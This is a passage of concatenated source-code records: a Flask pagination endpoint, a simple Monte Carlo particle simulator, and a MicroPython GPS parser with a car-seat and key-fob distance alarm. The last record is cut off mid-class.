__name__)\n@project_api.route('/public/project/get_projects_by_page',methods=['POST'])\n@json_response\ndef get_projects_by_page(result):\n data=request.get_json()\n\n page=data.get('page',1)\n page_size=data.get('page_size',20)\n is_recommend=data.get('is_recommend',None)\n status=data.get('status',None)\n order_by=data.get('order_by')\n if order_by==\"update\":\n order_by='updated_time desc'\n elif order_by==\"create\":\n order_by=\"created_time desc\"\n (projects,paginate)=project_service.query_projects_by_page(page=page,page_size=page_size,order_by=order_by,querys={\"status\":status,'is_recommend':is_recommend})\n\n arr=[]\n for project in projects:\n arr.append(project.as_map())\n result['projects']=arr\n\n","sub_path":"views/api/project_api.py","file_name":"project_api.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"413565630","text":"class MonteCarlo(object):\r\n \"Simple monte carlo class\"\r\n\r\n def __init__( self, temperature=1, itermax=100) :\r\n if temperature <= 0.0 :\r\n raise ValueError(\"Temperature must be *positive*.\")\r\n if not isinstance( itermax, int) : \r\n raise TypeError(\"itermax must be an *integer*.\")\r\n self.temperature = temperature\r\n \"\"\" Simulation Temperature \"\"\"\r\n self.itermax = itermax\r\n \"\"\" Maximum iterations to run \"\"\"\r\n\r\n\r\n def move_particle_randomly( self, density) :\r\n \"\"\" Randomly move one particle left or right \"\"\"\r\n from numpy import random, array\r\n density = array(density)\r\n # Choose random position (weighted by occupation number)\r\n particle_positions = []\r\n for i in range(len(density)) :\r\n particle_positions += [i] * density[i]\r\n pos1 = random.choice(particle_positions)\r\n # Randomly choose valid position for particle to move to\r\n while True :\r\n pos2 = pos1 + random.choice([-1,1])\r\n if 0 <= pos2 < len(density) : break\r\n newdensity = array(density)\r\n newdensity[pos1] -= 1\r\n newdensity[pos2] += 1\r\n return newdensity\r\n\r\n\r\n def accept_move( self, energy, density0, density1) :\r\n \"\"\" Accept or reject particle move based on energy function\"\"\"\r\n from numpy import random, exp\r\n E0 = energy(density0)\r\n E1 = energy(density1)\r\n if E1 < E0 : return True\r\n elif exp(-( E1 - E0) / self.temperature ) > random.random() : \r\n return True\r\n else : return False\r\n\r\n\r\n def __call__( self, initial_density, energy):\r\n \"\"\" Iterate MonteCarlo object up to itermax \"\"\"\r\n from numpy import any, array\r\n density = array(initial_density)\r\n if any(density < 0) : \r\n raise ValueError(\"Densities must be *non-negative*.\")\r\n if density.dtype.kind != 'i' :\r\n raise TypeError(\"Densities must be *integers*.\")\r\n if density.ndim != 1 :\r\n raise TypeError(\"Density must be *1D* array.\")\r\n if sum(density) == 0 :\r\n raise ValueError(\"Density can't be empty.\")\r\n if len(density) < 2 :\r\n raise ValueError(\"Density must be more than one site\")\r\n for i in range(self.itermax) :\r\n\r\n new_density = self.move_particle_randomly(density)\r\n\r\n if self.accept_move( energy, density, new_density) :\r\n density = new_density\r\n return density","sub_path":"monte_carlo_step.py","file_name":"monte_carlo_step.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"571433053","text":"# main.py -- put your code here!\n\n\"\"\"\n\nMICROPYTHON CLASS MODULE CODE\nTaken from 
https://github.com/inmcm/micropyGPS/blob/master/micropyGPS.py\n\n\"\"\"\n\nfrom math import floor, modf, sin, cos, asin, pi, sqrt, radians\n\n# Assume running on MicroPython\nimport utime\n\nimport time\nimport _thread\nimport pyb # pyboard peripherals (Pin, UART, ADC, LED, Switch) used by the Subsystem code below\n\nclass MicropyGPS(object):\n \"\"\"GPS NMEA Sentence Parser. Creates object that stores all relevant GPS data and statistics.\n Parses sentences one character at a time using update(). \"\"\"\n\n # Max Number of Characters a valid sentence can be (based on GGA sentence)\n SENTENCE_LIMIT = 90\n __HEMISPHERES = ('N', 'S', 'E', 'W')\n __NO_FIX = 1\n __FIX_2D = 2\n __FIX_3D = 3\n __DIRECTIONS = ('N', 'NNE', 'NE', 'ENE', 'E', 'ESE', 'SE', 'SSE', 'S', 'SSW', 'SW', 'WSW', 'W',\n 'WNW', 'NW', 'NNW')\n __MONTHS = ('January', 'February', 'March', 'April', 'May',\n 'June', 'July', 'August', 'September', 'October',\n 'November', 'December')\n\n def __init__(self, local_offset=0, location_formatting='ddm'):\n \"\"\"\n Setup GPS Object Status Flags, Internal Data Registers, etc\n local_offset (int): Timezone Difference to UTC\n location_formatting (str): Style For Presenting Longitude/Latitude:\n Decimal Degree Minute (ddm) - 40° 26.767′ N\n Degrees Minutes Seconds (dms) - 40° 26′ 46″ N\n Decimal Degrees (dd) - 40.446° N\n \"\"\"\n\n #####################\n # Object Status Flags\n self.sentence_active = False\n self.active_segment = 0\n self.process_crc = False\n self.gps_segments = []\n self.crc_xor = 0\n self.char_count = 0\n self.fix_time = 0\n\n #####################\n # Sentence Statistics\n self.crc_fails = 0\n self.clean_sentences = 0\n self.parsed_sentences = 0\n\n #####################\n # Logging Related\n self.log_handle = None\n self.log_en = False\n\n #####################\n # Data From Sentences\n # Time\n self.timestamp = [0, 0, 0]\n self.date = [0, 0, 0]\n self.local_offset = local_offset\n\n # Position/Motion\n self._latitude = [0, 0.0, 'N']\n self._longitude = [0, 0.0, 'W']\n self.coord_format = location_formatting\n self.speed = [0.0, 0.0, 0.0]\n self.course = 0.0\n self.altitude = 0.0\n self.geoid_height = 0.0\n\n # GPS Info\n self.satellites_in_view = 0\n self.satellites_in_use = 0\n self.satellites_used = []\n self.last_sv_sentence = 0\n self.total_sv_sentences = 0\n self.satellite_data = dict()\n self.hdop = 0.0\n self.pdop = 0.0\n self.vdop = 0.0\n self.valid = False\n self.fix_stat = 0\n self.fix_type = 1\n\n ########################################\n # Coordinates Translation Functions\n ########################################\n @property\n def latitude(self):\n \"\"\"Format Latitude Data Correctly\"\"\"\n if self.coord_format == 'dd':\n decimal_degrees = self._latitude[0] + (self._latitude[1] / 60)\n return [decimal_degrees, self._latitude[2]]\n elif self.coord_format == 'dms':\n minute_parts = modf(self._latitude[1])\n seconds = round(minute_parts[0] * 60)\n return [self._latitude[0], int(minute_parts[1]), seconds, self._latitude[2]]\n else:\n return self._latitude\n\n @property\n def longitude(self):\n \"\"\"Format Longitude Data Correctly\"\"\"\n if self.coord_format == 'dd':\n decimal_degrees = self._longitude[0] + (self._longitude[1] / 60)\n return [decimal_degrees, self._longitude[2]]\n elif self.coord_format == 'dms':\n minute_parts = modf(self._longitude[1])\n seconds = round(minute_parts[0] * 60)\n return [self._longitude[0], int(minute_parts[1]), seconds, self._longitude[2]]\n else:\n return self._longitude\n\n ########################################\n # Logging Related Functions\n ########################################\n def start_logging(self, 
target_file, mode=\"append\"):\n \"\"\"\n Create GPS data log object\n \"\"\"\n # Set Write Mode Overwrite or Append\n mode_code = 'w' if mode == 'new' else 'a'\n\n try:\n self.log_handle = open(target_file, mode_code)\n except AttributeError:\n print(\"Invalid FileName\")\n return False\n\n self.log_en = True\n return True\n\n def stop_logging(self):\n \"\"\"\n Closes the log file handler and disables further logging\n \"\"\"\n try:\n self.log_handle.close()\n except AttributeError:\n print(\"Invalid Handle\")\n return False\n\n self.log_en = False\n return True\n\n def write_log(self, log_string):\n \"\"\"Attempts to write the last valid NMEA sentence character to the active file handler\n \"\"\"\n try:\n self.log_handle.write(log_string)\n except TypeError:\n return False\n return True\n\n ########################################\n # Sentence Parsers\n ########################################\n def gprmc(self):\n \"\"\"Parse Recommended Minimum Specific GPS/Transit data (RMC)Sentence.\n Updates UTC timestamp, latitude, longitude, Course, Speed, Date, and fix status\n \"\"\"\n\n # UTC Timestamp\n try:\n utc_string = self.gps_segments[1]\n\n if utc_string: # Possible timestamp found\n hours = (int(utc_string[0:2]) + self.local_offset) % 24\n minutes = int(utc_string[2:4])\n seconds = float(utc_string[4:])\n self.timestamp = (hours, minutes, seconds)\n else: # No Time stamp yet\n self.timestamp = (0, 0, 0)\n\n except ValueError: # Bad Timestamp value present\n return False\n\n # Date stamp\n try:\n date_string = self.gps_segments[9]\n\n # Date string printer function assumes to be year >=2000,\n # date_string() must be supplied with the correct century argument to display correctly\n if date_string: # Possible date stamp found\n day = int(date_string[0:2])\n month = int(date_string[2:4])\n year = int(date_string[4:6])\n self.date = (day, month, year)\n else: # No Date stamp yet\n self.date = (0, 0, 0)\n\n except ValueError: # Bad Date stamp value present\n return False\n\n # Check Receiver Data Valid Flag\n if self.gps_segments[2] == 'A': # Data from Receiver is Valid/Has Fix\n\n # Longitude / Latitude\n try:\n # Latitude\n l_string = self.gps_segments[3]\n lat_degs = int(l_string[0:2])\n lat_mins = float(l_string[2:])\n lat_hemi = self.gps_segments[4]\n\n # Longitude\n l_string = self.gps_segments[5]\n lon_degs = int(l_string[0:3])\n lon_mins = float(l_string[3:])\n lon_hemi = self.gps_segments[6]\n except ValueError:\n return False\n\n if lat_hemi not in self.__HEMISPHERES:\n return False\n\n if lon_hemi not in self.__HEMISPHERES:\n return False\n\n # Speed\n try:\n spd_knt = float(self.gps_segments[7])\n except ValueError:\n return False\n\n # Course\n try:\n if self.gps_segments[8]:\n course = float(self.gps_segments[8])\n else:\n course = 0.0\n except ValueError:\n return False\n\n # TODO - Add Magnetic Variation\n\n # Update Object Data\n self._latitude = [lat_degs, lat_mins, lat_hemi]\n self._longitude = [lon_degs, lon_mins, lon_hemi]\n # Include mph and hm/h\n self.speed = [spd_knt, spd_knt * 1.151, spd_knt * 1.852]\n self.course = course\n self.valid = True\n\n # Update Last Fix Time\n self.new_fix_time()\n\n else: # Clear Position Data if Sentence is 'Invalid'\n self._latitude = [0, 0.0, 'N']\n self._longitude = [0, 0.0, 'W']\n self.speed = [0.0, 0.0, 0.0]\n self.course = 0.0\n self.valid = False\n\n return True\n\n def gpgll(self):\n \"\"\"Parse Geographic Latitude and Longitude (GLL)Sentence. 
Updates UTC timestamp, latitude,\n longitude, and fix status\"\"\"\n\n # UTC Timestamp\n try:\n utc_string = self.gps_segments[5]\n\n if utc_string: # Possible timestamp found\n hours = (int(utc_string[0:2]) + self.local_offset) % 24\n minutes = int(utc_string[2:4])\n seconds = float(utc_string[4:])\n self.timestamp = (hours, minutes, seconds)\n else: # No Time stamp yet\n self.timestamp = (0, 0, 0)\n\n except ValueError: # Bad Timestamp value present\n return False\n\n # Check Receiver Data Valid Flag\n if self.gps_segments[6] == 'A': # Data from Receiver is Valid/Has Fix\n\n # Longitude / Latitude\n try:\n # Latitude\n l_string = self.gps_segments[1]\n lat_degs = int(l_string[0:2])\n lat_mins = float(l_string[2:])\n lat_hemi = self.gps_segments[2]\n\n # Longitude\n l_string = self.gps_segments[3]\n lon_degs = int(l_string[0:3])\n lon_mins = float(l_string[3:])\n lon_hemi = self.gps_segments[4]\n except ValueError:\n return False\n\n if lat_hemi not in self.__HEMISPHERES:\n return False\n\n if lon_hemi not in self.__HEMISPHERES:\n return False\n\n # Update Object Data\n self._latitude = [lat_degs, lat_mins, lat_hemi]\n self._longitude = [lon_degs, lon_mins, lon_hemi]\n self.valid = True\n\n # Update Last Fix Time\n self.new_fix_time()\n\n else: # Clear Position Data if Sentence is 'Invalid'\n self._latitude = [0, 0.0, 'N']\n self._longitude = [0, 0.0, 'W']\n self.valid = False\n\n return True\n\n def gpvtg(self):\n \"\"\"Parse Track Made Good and Ground Speed (VTG) Sentence. Updates speed and course\"\"\"\n try:\n course = float(self.gps_segments[1])\n spd_knt = float(self.gps_segments[5])\n except ValueError:\n return False\n\n # Include mph and km/h\n self.speed = (spd_knt, spd_knt * 1.151, spd_knt * 1.852)\n self.course = course\n return True\n\n def gpgga(self):\n \"\"\"Parse Global Positioning System Fix Data (GGA) Sentence. 
Updates UTC timestamp, latitude, longitude,\n fix status, satellites in use, Horizontal Dilution of Precision (HDOP), altitude, geoid height and fix status\"\"\"\n\n try:\n # UTC Timestamp\n utc_string = self.gps_segments[1]\n\n # Skip timestamp if receiver doesn't have on yet\n if utc_string:\n hours = (int(utc_string[0:2]) + self.local_offset) % 24\n minutes = int(utc_string[2:4])\n seconds = float(utc_string[4:])\n else:\n hours = 0\n minutes = 0\n seconds = 0.0\n\n # Number of Satellites in Use\n satellites_in_use = int(self.gps_segments[7])\n\n # Get Fix Status\n fix_stat = int(self.gps_segments[6])\n\n except (ValueError, IndexError):\n return False\n\n try:\n # Horizontal Dilution of Precision\n hdop = float(self.gps_segments[8])\n except (ValueError, IndexError):\n hdop = 0.0\n\n # Process Location and Speed Data if Fix is GOOD\n if fix_stat:\n\n # Longitude / Latitude\n try:\n # Latitude\n l_string = self.gps_segments[2]\n lat_degs = int(l_string[0:2])\n lat_mins = float(l_string[2:])\n lat_hemi = self.gps_segments[3]\n\n # Longitude\n l_string = self.gps_segments[4]\n lon_degs = int(l_string[0:3])\n lon_mins = float(l_string[3:])\n lon_hemi = self.gps_segments[5]\n except ValueError:\n return False\n\n if lat_hemi not in self.__HEMISPHERES:\n return False\n\n if lon_hemi not in self.__HEMISPHERES:\n return False\n\n # Altitude / Height Above Geoid\n try:\n altitude = float(self.gps_segments[9])\n geoid_height = float(self.gps_segments[11])\n except ValueError:\n altitude = 0\n geoid_height = 0\n\n # Update Object Data\n self._latitude = [lat_degs, lat_mins, lat_hemi]\n self._longitude = [lon_degs, lon_mins, lon_hemi]\n self.altitude = altitude\n self.geoid_height = geoid_height\n\n # Update Object Data\n self.timestamp = [hours, minutes, seconds]\n self.satellites_in_use = satellites_in_use\n self.hdop = hdop\n self.fix_stat = fix_stat\n\n # If Fix is GOOD, update fix timestamp\n if fix_stat:\n self.new_fix_time()\n\n return True\n\n def gpgsa(self):\n \"\"\"Parse GNSS DOP and Active Satellites (GSA) sentence. Updates GPS fix type, list of satellites used in\n fix calculation, Position Dilution of Precision (PDOP), Horizontal Dilution of Precision (HDOP), Vertical\n Dilution of Precision, and fix status\"\"\"\n\n # Fix Type (None,2D or 3D)\n try:\n fix_type = int(self.gps_segments[2])\n except ValueError:\n return False\n\n # Read All (up to 12) Available PRN Satellite Numbers\n sats_used = []\n for sats in range(12):\n sat_number_str = self.gps_segments[3 + sats]\n if sat_number_str:\n try:\n sat_number = int(sat_number_str)\n sats_used.append(sat_number)\n except ValueError:\n return False\n else:\n break\n\n # PDOP,HDOP,VDOP\n try:\n pdop = float(self.gps_segments[15])\n hdop = float(self.gps_segments[16])\n vdop = float(self.gps_segments[17])\n except ValueError:\n return False\n\n # Update Object Data\n self.fix_type = fix_type\n\n # If Fix is GOOD, update fix timestamp\n if fix_type > self.__NO_FIX:\n self.new_fix_time()\n\n self.satellites_used = sats_used\n self.hdop = hdop\n self.vdop = vdop\n self.pdop = pdop\n\n return True\n\n def gpgsv(self):\n \"\"\"Parse Satellites in View (GSV) sentence. 
Updates number of SV Sentences,the number of the last SV sentence\n parsed, and data on each satellite present in the sentence\"\"\"\n try:\n num_sv_sentences = int(self.gps_segments[1])\n current_sv_sentence = int(self.gps_segments[2])\n sats_in_view = int(self.gps_segments[3])\n except ValueError:\n return False\n\n # Create a blank dict to store all the satellite data from this sentence in:\n # satellite PRN is key, tuple containing telemetry is value\n satellite_dict = dict()\n\n # Calculate Number of Satelites to pull data for and thus how many segment positions to read\n if num_sv_sentences == current_sv_sentence:\n # Last sentence may have 1-4 satellites; 5 - 20 positions\n sat_segment_limit = (sats_in_view - ((num_sv_sentences - 1) * 4)) * 5\n else:\n sat_segment_limit = 20 # Non-last sentences have 4 satellites and thus read up to position 20\n\n # Try to recover data for up to 4 satellites in sentence\n for sats in range(4, sat_segment_limit, 4):\n\n # If a PRN is present, grab satellite data\n if self.gps_segments[sats]:\n try:\n sat_id = int(self.gps_segments[sats])\n except (ValueError,IndexError):\n return False\n\n try: # elevation can be null (no value) when not tracking\n elevation = int(self.gps_segments[sats+1])\n except (ValueError,IndexError):\n elevation = None\n\n try: # azimuth can be null (no value) when not tracking\n azimuth = int(self.gps_segments[sats+2])\n except (ValueError,IndexError):\n azimuth = None\n\n try: # SNR can be null (no value) when not tracking\n snr = int(self.gps_segments[sats+3])\n except (ValueError,IndexError):\n snr = None\n # If no PRN is found, then the sentence has no more satellites to read\n else:\n break\n\n # Add Satellite Data to Sentence Dict\n satellite_dict[sat_id] = (elevation, azimuth, snr)\n\n # Update Object Data\n self.total_sv_sentences = num_sv_sentences\n self.last_sv_sentence = current_sv_sentence\n self.satellites_in_view = sats_in_view\n\n # For a new set of sentences, we either clear out the existing sat data or\n # update it as additional SV sentences are parsed\n if current_sv_sentence == 1:\n self.satellite_data = satellite_dict\n else:\n self.satellite_data.update(satellite_dict)\n\n return True\n\n ##########################################\n # Data Stream Handler Functions\n ##########################################\n\n def new_sentence(self):\n \"\"\"Adjust Object Flags in Preparation for a New Sentence\"\"\"\n self.gps_segments = ['']\n self.active_segment = 0\n self.crc_xor = 0\n self.sentence_active = True\n self.process_crc = True\n self.char_count = 0\n\n def update(self, new_char):\n \"\"\"Process a new input char and updates GPS object if necessary based on special characters ('$', ',', '*')\n Function builds a list of received string that are validate by CRC prior to parsing by the appropriate\n sentence function. 
Returns sentence type on successful parse, None otherwise\"\"\"\n\n valid_sentence = False\n\n # Validate new_char is a printable char\n ascii_char = ord(new_char)\n\n if 10 <= ascii_char <= 126:\n self.char_count += 1\n\n # Write Character to log file if enabled\n if self.log_en:\n self.write_log(new_char)\n\n # Check if a new string is starting ($)\n if new_char == '$':\n self.new_sentence()\n return None\n\n elif self.sentence_active:\n\n # Check if sentence is ending (*)\n if new_char == '*':\n self.process_crc = False\n self.active_segment += 1\n self.gps_segments.append('')\n return None\n\n # Check if a section is ended (,), Create a new substring to feed\n # characters to\n elif new_char == ',':\n self.active_segment += 1\n self.gps_segments.append('')\n\n # Store All Other printable character and check CRC when ready\n else:\n self.gps_segments[self.active_segment] += new_char\n\n # When CRC input is disabled, sentence is nearly complete\n if not self.process_crc:\n\n if len(self.gps_segments[self.active_segment]) == 2:\n try:\n final_crc = int(self.gps_segments[self.active_segment], 16)\n if self.crc_xor == final_crc:\n valid_sentence = True\n else:\n self.crc_fails += 1\n except ValueError:\n pass # CRC Value was deformed and could not have been correct\n\n # Update CRC\n if self.process_crc:\n self.crc_xor ^= ascii_char\n\n # If a Valid Sentence Was received and it's a supported sentence, then parse it!!\n if valid_sentence:\n self.clean_sentences += 1 # Increment clean sentences received\n self.sentence_active = False # Clear Active Processing Flag\n\n if self.gps_segments[0] in self.supported_sentences:\n\n # parse the Sentence Based on the message type, return True if parse is clean\n if self.supported_sentences[self.gps_segments[0]](self):\n\n # Let host know that the GPS object was updated by returning parsed sentence type\n self.parsed_sentences += 1\n return self.gps_segments[0]\n\n # Check that the sentence buffer isn't filling up with Garage waiting for the sentence to complete\n if self.char_count > self.SENTENCE_LIMIT:\n self.sentence_active = False\n\n # Tell Host no new sentence was parsed\n return None\n\n def new_fix_time(self):\n \"\"\"Updates a high resolution counter with current time when fix is updated. Currently only triggered from\n GGA, GSA and RMC sentences\"\"\"\n try:\n self.fix_time = utime.ticks_ms()\n except NameError:\n self.fix_time = time.time()\n\n #########################################\n # User Helper Functions\n # These functions make working with the GPS object data easier\n #########################################\n\n def satellite_data_updated(self):\n \"\"\"\n Checks if the all the GSV sentences in a group have been read, making satellite data complete\n :return: boolean\n \"\"\"\n if self.total_sv_sentences > 0 and self.total_sv_sentences == self.last_sv_sentence:\n return True\n else:\n return False\n\n def satellites_visible(self):\n \"\"\"\n Returns a list of of the satellite PRNs currently visible to the receiver\n :return: list\n \"\"\"\n return list(self.satellite_data.keys())\n\n def time_since_fix(self):\n \"\"\"Returns number of millisecond since the last sentence with a valid fix was parsed. 
Returns 0 if\n no fix has been found\"\"\"\n\n # Test if a Fix has been found\n if self.fix_time == 0:\n return -1\n\n # Try calculating fix time using utime; if not running MicroPython\n # time.time() returns a floating point value in secs\n try:\n current = utime.ticks_diff(utime.ticks_ms(), self.fix_time)\n except NameError:\n current = (time.time() - self.fix_time) * 1000 # ms\n\n return current\n\n def compass_direction(self):\n \"\"\"\n Determine a cardinal or inter-cardinal direction based on current course.\n :return: string\n \"\"\"\n # Calculate the offset for a rotated compass\n if self.course >= 348.75:\n offset_course = 360 - self.course\n else:\n offset_course = self.course + 11.25\n\n # Each compass point is separated by 22.5 degrees, divide to find lookup value\n dir_index = floor(offset_course / 22.5)\n\n final_dir = self.__DIRECTIONS[dir_index]\n\n return final_dir\n\n def latitude_string(self):\n \"\"\"\n Create a readable string of the current latitude data\n :return: string\n \"\"\"\n if self.coord_format == 'dd':\n formatted_latitude = self.latitude\n lat_string = str(formatted_latitude[0]) + '° ' + str(self._latitude[2])\n elif self.coord_format == 'dms':\n formatted_latitude = self.latitude\n lat_string = str(formatted_latitude[0]) + '° ' + str(formatted_latitude[1]) + \"' \" + str(formatted_latitude[2]) + '\" ' + str(formatted_latitude[3])\n else:\n lat_string = str(self._latitude[0]) + '° ' + str(self._latitude[1]) + \"' \" + str(self._latitude[2])\n return lat_string\n\n def longitude_string(self):\n \"\"\"\n Create a readable string of the current longitude data\n :return: string\n \"\"\"\n if self.coord_format == 'dd':\n formatted_longitude = self.longitude\n lon_string = str(formatted_longitude[0]) + '° ' + str(self._longitude[2])\n elif self.coord_format == 'dms':\n formatted_longitude = self.longitude\n lon_string = str(formatted_longitude[0]) + '° ' + str(formatted_longitude[1]) + \"' \" + str(formatted_longitude[2]) + '\" ' + str(formatted_longitude[3])\n else:\n lon_string = str(self._longitude[0]) + '° ' + str(self._longitude[1]) + \"' \" + str(self._longitude[2])\n return lon_string\n\n def speed_string(self, unit='kph'):\n \"\"\"\n Creates a readable string of the current speed data in one of three units\n :param unit: string of 'kph', 'mph', or 'knot'\n :return:\n \"\"\"\n if unit == 'mph':\n speed_string = str(self.speed[1]) + ' mph'\n\n elif unit == 'knot':\n if self.speed[0] == 1:\n unit_str = ' knot'\n else:\n unit_str = ' knots'\n speed_string = str(self.speed[0]) + unit_str\n\n else:\n speed_string = str(self.speed[2]) + ' km/h'\n\n return speed_string\n\n def date_string(self, formatting='s_mdy', century='20'):\n \"\"\"\n Creates a readable string of the current date.\n Can select between long format: January 1st, 2014\n or two short formats:\n 11/01/2014 (MM/DD/YYYY)\n 01/11/2014 (DD/MM/YYYY)\n :param formatting: string 's_mdy', 's_dmy', or 'long'\n :param century: int delineating the century the GPS data is from (19 for 19XX, 20 for 20XX)\n :return: date_string string with long or short format date\n \"\"\"\n\n # Long Format January 1st, 2014\n if formatting == 'long':\n # Retrieve Month string from private set\n month = self.__MONTHS[self.date[1] - 1]\n\n # Determine Date Suffix\n if self.date[0] in (1, 21, 31):\n suffix = 'st'\n elif self.date[0] in (2, 22):\n suffix = 'nd'\n elif self.date[0] in (3, 23):\n suffix = 'rd'\n else:\n suffix = 'th'\n\n day = str(self.date[0]) + suffix # Create Day String\n\n year = century + str(self.date[2]) # 
Create Year String\n\n date_string = month + ' ' + day + ', ' + year # Put it all together\n\n else:\n # Add leading zeros to day string if necessary\n if self.date[0] < 10:\n day = '0' + str(self.date[0])\n else:\n day = str(self.date[0])\n\n # Add leading zeros to month string if necessary\n if self.date[1] < 10:\n month = '0' + str(self.date[1])\n else:\n month = str(self.date[1])\n\n # Add leading zeros to year string if necessary\n if self.date[2] < 10:\n year = '0' + str(self.date[2])\n else:\n year = str(self.date[2])\n\n # Build final string based on desired formatting\n if formatting == 's_dmy':\n date_string = day + '/' + month + '/' + year\n\n else: # Default date format\n date_string = month + '/' + day + '/' + year\n\n return date_string\n\n # All the currently supported NMEA sentences\n supported_sentences = {'GPRMC': gprmc, 'GLRMC': gprmc,\n 'GPGGA': gpgga, 'GLGGA': gpgga,\n 'GPVTG': gpvtg, 'GLVTG': gpvtg,\n 'GPGSA': gpgsa, 'GLGSA': gpgsa,\n 'GPGSV': gpgsv, 'GLGSV': gpgsv,\n 'GPGLL': gpgll, 'GLGLL': gpgll,\n 'GNGGA': gpgga, 'GNRMC': gprmc,\n 'GNVTG': gpvtg, 'GNGLL': gpgll,\n 'GNGSA': gpgsa,\n }\n\n\n\"\"\"\n\nMICROPYTHON CLASS MODULE CODE\nTaken from https://github.com/inmcm/micropyGPS/blob/master/micropyGPS.py\n\n\"\"\"\n\nclass Subsystem(object):\n def __init__(self, subsystem_type, power_estimator_adc_pin_name, power_estimator_adc_gpio_pin_name, telemetry_module_uart_pin_number, gps_module_uart_number, vibration_motor_pin_name, buzzer_pin_name):\n self.subsystem_type = subsystem_type\n self.power_estimator = Subsystem.PowerEstimator(adc_pin_name=power_estimator_adc_pin_name, gpio_pin_name=power_estimator_adc_gpio_pin_name)\n self.telemetry_module = Subsystem.TelemetryModule(uart_number=telemetry_module_uart_pin_number)\n self.gps_module = Subsystem.GPS_Module(uart_number=gps_module_uart_number)\n self.buzzer_pin = pyb.Pin(buzzer_pin_name, pyb.Pin.OUT_PP)\n self.vibration_motor_pin = pyb.Pin(vibration_motor_pin_name, pyb.Pin.OUT_PP)\n self.alarm_ringing = 0\n self.stop_flag = 0\n self.time_since_disarm = 120\n # Set up alarm off button\n pyb.Switch().callback(lambda: self.disarm_alarm())\n\n if self.subsystem_type == 'key_fob':\n self.armed = 0\n elif self.subsystem_type == 'car_seat':\n self.armed = 1\n\n def run(self):\n distance_threshold = 20 # 20 meters\n max_communication_wait_time = 15 # max communication wait time is 15 seconds\n rearm_time = 120 # rearm in 2 minutes after disarming\n percent_power_remaining = self.power_estimator.get_power_estimate()\n percent_power_remaining_threshold = 75\n\n if self.subsystem_type == 'key_fob':\n _thread.start_new_thread( update_gps_thread, (\"Update GPS Location Thread\", self, 0.1) )\n _thread.start_new_thread( telemetry_listen_thread, (\"Telemetry Listen Thread\", self, 0.1) )\n elif self.subsystem_type == 'car_seat':\n _thread.start_new_thread( update_gps_thread, (\"Update GPS Location Thread\", self, 0.1) )\n _thread.start_new_thread( transmit_location_thread, (\"Transmit Location Thread\", self, 0.2) )\n\n while True:\n if self.subsystem_type == \"key_fob\":\n # While there is enough power\n while percent_power_remaining > percent_power_remaining_threshold:\n print(self.subsystem_type, \" is running. 
Current location\", self.gps_module.get_location())\n print(\"percent_power_remaining\", percent_power_remaining)\n\n if self.telemetry_module.time_since_last_message < max_communication_wait_time:\n # Calculate the distance between subsystems\n distance_between_subsystems = self.calculate_distance_between_subsystems()\n\n # If alarm is armed\n if self.armed:\n # If distance is greater than threshold\n if distance_between_subsystems > distance_threshold:\n # Sound alarm\n self.sound_alarm()\n else:\n # Ensure alarm is quiet\n self.quiet_alarm()\n # If it has been too long since a message\n else:\n # And alarm is armed. Sound alarm.\n if self.armed:\n self.sound_alarm()\n # Else alarm is not armed, ensure it is quiet.\n else:\n self.quiet_alarm()\n\n if self.telemetry_module.last_armed:\n if self.time_since_disarm < rearm_time:\n self.armed = 0\n else:\n self.armed = 1\n\n # Get updated power estimate.\n percent_power_remaining = self.power_estimator.get_power_estimate()\n\n time.sleep(1)\n self.time_since_disarm += 1\n elif self.subsystem_type == 'car_seat':\n # While there is enough power\n while percent_power_remaining > percent_power_remaining_threshold:\n # Get updated power estimate.\n percent_power_remaining = self.power_estimator.get_power_estimate()\n\n time.sleep(5)\n\n pyb.LED(1).on()\n self.stop_flag = 1\n\n buzz = 1\n while percent_power_remaining <= percent_power_remaining_threshold:\n print(\"Power is low running on reserves | percent_power_remaining =\", percent_power_remaining, \"|\")\n percent_power_remaining = self.power_estimator.get_power_estimate()\n pyb.LED(1).toggle()\n if buzz:\n self.buzzer_pin.high()\n buzz = 0\n else:\n self.buzzer_pin.low()\n buzz = 1\n time.sleep(1)\n pyb.LED(1).off()\n self.stop_flag = 0\n\n def sound_alarm(self):\n if self.alarm_ringing:\n self.buzzer_pin.high()\n self.vibration_motor_pin.high()\n self.alarm_ringing = 0\n else:\n self.buzzer_pin.low()\n self.vibration_motor_pin.low()\n self.alarm_ringing = 1\n\n def quiet_alarm(self):\n self.buzzer_pin.low()\n self.vibration_motor_pin.low()\n\n def disarm_alarm(self):\n self.armed = 0\n self.time_since_disarm = 0\n self.quiet_alarm()\n\n def calculate_distance_between_subsystems(self):\n my_latitude, my_longitude = self.gps_module.get_location()\n other_latitude = self.telemetry_module.last_latitude\n other_longitude = self.telemetry_module.last_longitude\n\n if my_latitude == 0 or my_longitude == 0 or other_latitude == 0 or other_longitude == 0:\n return 0\n else:\n R = 6372.8 # Earth radius in kilometers\n\n dLat = radians(other_latitude - my_latitude)\n print(\"dLat\", dLat)\n dLon = radians(other_longitude - my_longitude)\n print(\"dLon\", dLon)\n lat1 = radians(my_latitude)\n lat2 = radians(other_latitude)\n\n a = sin(dLat / 2)**2 + cos(lat1) * cos(lat2) * sin(dLon / 2)**2\n c = 2 * asin(sqrt(a))\n\n return R * c * 1000\n\n class PowerEstimator(object):\n def __init__(self, adc_pin_name, gpio_pin_name):\n self.adc_pin = pyb.ADC(pyb.Pin(adc_pin_name))\n self.gpio_pin = pyb.Pin(gpio_pin_name)\n self.starting_counts = None\n self.percent_power_remaining = None\n\n def get_power_estimate(self):\n self.gpio_pin.high()\n\n adc_counts = self.adc_pin.read()\n\n self.gpio_pin.low()\n\n if self.starting_counts is None:\n if adc_counts == 0:\n self.starting_counts = 1\n else:\n self.starting_counts = adc_counts\n self.percent_power_remaining = 100.0\n else:\n self.percent_power_remaining = adc_counts / self.starting_counts * 100\n\n return self.percent_power_remaining\n\n class 
